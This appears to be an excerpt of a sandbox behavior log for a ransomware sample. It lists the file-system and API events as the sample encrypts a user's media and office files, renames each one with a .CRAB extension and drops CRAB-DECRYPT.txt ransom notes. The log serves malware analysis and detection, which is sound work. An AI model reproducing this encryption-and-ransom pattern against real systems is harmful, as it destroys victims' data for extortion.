| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3, size = 1048576, size_out = 76716 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3, size = 76720 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx, size = 1048576, size_out = 7202 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx, size = 7216 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls, size = 1048576, size_out = 89677 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls, size = 89680 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv, size = 1048576, size_out = 5457 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv, size = 5472 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv, size = 1048576, size_out = 17614 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv, size = 17616 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx, size = 1048576, size_out = 58874 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx, size = 58880 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav, size = 1048576, size_out = 92152 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav, size = 92160 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx, size = 1048576, size_out = 69299 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx, size = 69312 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Contacts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Contacts\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Cookies\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv, size = 1048576, size_out = 14552 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv, size = 14560 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv, destination_filename = C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png, size = 1048576, size_out = 78244 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png, size = 78256 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png, destination_filename = C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg, size = 1048576, size_out = 58233 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg, size = 58240 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg, destination_filename = C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4, size = 1048576, size_out = 8213 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4, size = 8224 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4, destination_filename = C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3, size = 1048576, size_out = 38133 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3, size = 38144 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3, destination_filename = C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots, size = 1048576, size_out = 57723 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots, size = 57728 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots, destination_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a, size = 1048576, size_out = 45821 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a, size = 45824 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a, destination_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf, size = 1048576, size_out = 58932 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf, size = 58944 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf, destination_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif, size = 1048576, size_out = 81946 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif, size = 81952 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif, destination_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a, size = 1048576, size_out = 25027 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a, size = 25040 |
|
1 | |
